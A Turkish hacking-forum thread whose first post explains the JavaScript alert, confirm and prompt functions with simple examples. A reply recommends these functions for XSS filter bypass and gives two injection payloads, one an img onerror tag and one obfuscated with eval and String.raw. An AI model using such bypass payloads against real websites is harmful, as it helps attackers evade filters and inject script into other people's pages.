THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

Alert, Prompt ve Confirm Komutları Anlatımı //MyGf ~#Stajer

MyGf - ait Kullanıcı Resmi (Avatar)
Researcher
Üyelik tarihi:
07/2016
Nereden:
Hall of Fame
Mesajlar:
3.284
Konular:
315
Teşekkür (Etti):
513
Teşekkür (Aldı):
1294
Ticaret:
(0) %
06-02-2017 18:52
#1
Alert, Prompt ve Confirm Komutları Anlatımı //MyGf ~#Stajer
Merhaba Arkadaşlar.
Bu özgün konumda size prompt, confirm ve alert komutlarının ne işe yaradığını anlatacağım. Dilerseniz Başlayalım.

1. Alert

Alert komutu Türkçe anlamıyla uyarı komutudur. Size bilgi verir.

Örnek Komut Dizisi:

Kod:
<html>
<body>
        <script type="text/javascript">
                alert("Uyarı Mesajım Alert Komutunu Kullandım.");
        </script>
</body>
</html>


2. Confirm

Confirm komutu bir soruyu vs. onaylama veya vazgeçme bildirisidir.

Örnek Komut Dizisi:

Kod:
<html>
<body>
   <script type="text/javascript">
        confirm("Confirm Komutu Kullanımı");
   </script>
</body>
</html>


3. Prompt

Ziyaretçiden bilgi alma iki tür JavaScript komutuyla gerçekleşir. Birisi Prompt yani bizim burada bahsedeceğimiz komut. Diğeri ise Form yoluyla bilgi alınması. Form yoluyla alınan bilgiler formun Html üzerinde yer alması yüzünden Prompt komutu ile birbirinden ayrılır. Prompt komutu ile Html sayfasından hariç bir pencere açılır. Alınmak istenen bilgi ziyaretçiye bu yol ile sorulur ve hemen altındaki boşluk yardımıyla cevap alınır.

Örnek Komut Dizisi:

Kod:
<html>
<body>
   <script type="text/javascript">
         ad=prompt("Adınızı Giriniz");
         d-ocument.write("Hoşgeldin " + ad +"!");
   </script>
</body>
</html>



Konum bu kadar arkadaşlar. Teşekkürler (:
Not: Alıntı değildir ama farklı kaynaklardan yardım alınmıştır.
Balamir97 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2013
Nereden:
Nowhere
Yaş:
16
Mesajlar:
2.624
Konular:
240
Teşekkür (Etti):
338
Teşekkür (Aldı):
558
Ticaret:
(0) %
07-02-2017 04:34
#2
Eline sağlık kardeşim XSS bypass yapmak isteyenlere confirm veya prompt kodlarının kullanmasını öneririm

Bunun haricimde
Alıntı:
data:windows.confirm
koduda işe yarayabilir

Alıntı:
"><img src=x onerror=data:window.confirm(/XSS/)>
veya bunu biraz daha heyecanlı hale getirmek istiyorsak eval'ide kullanabiliriz

Alıntı:
<image src=x onerror="Data:window.eval(String.raw({raw:'cnirm`1 `'},'o','f'));"
---------------------

Think like a Coder
Deface like a Hacker
See like a Grapher

Marpuç+Tütün+Güzel olan herşey : Powerpuff Nargile
MyGf - ait Kullanıcı Resmi (Avatar)
Researcher
Üyelik tarihi:
07/2016
Nereden:
Hall of Fame
Mesajlar:
3.284
Konular:
315
Teşekkür (Etti):
513
Teşekkür (Aldı):
1294
Ticaret:
(0) %
07-02-2017 07:00
#3
Alıntı:
Balamir97´isimli üyeden Alıntı Mesajı göster
Eline sağlık kardeşim XSS bypass yapmak isteyenlere confirm veya prompt kodlarının kullanmasını öneririm

Bunun haricimde koduda işe yarayabilir



veya bunu biraz daha heyecanlı hale getirmek istiyorsak eval'ide kullanabiliriz
Sağolun hocam. Okuldan dönünce birkaç düzenleme yaparım. Teşekkürler (:
"P4RS - ait Kullanıcı Resmi (Avatar)
Green Team Lideri
Üyelik tarihi:
01/2017
Nereden:
Balkes
Yaş:
18
Mesajlar:
4.585
Konular:
489
Teşekkür (Etti):
1158
Teşekkür (Aldı):
2334
Ticaret:
(0) %
07-02-2017 07:50
#4
Ellerine sağlık hocam
MyGf - ait Kullanıcı Resmi (Avatar)
Researcher
Üyelik tarihi:
07/2016
Nereden:
Hall of Fame
Mesajlar:
3.284
Konular:
315
Teşekkür (Etti):
513
Teşekkür (Aldı):
1294
Ticaret:
(0) %
07-02-2017 08:08
#5
Alıntı:
WhiteRed´isimli üyeden Alıntı Mesajı göster
Ellerine sağlık hocam
Sağ olun hocam (:

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler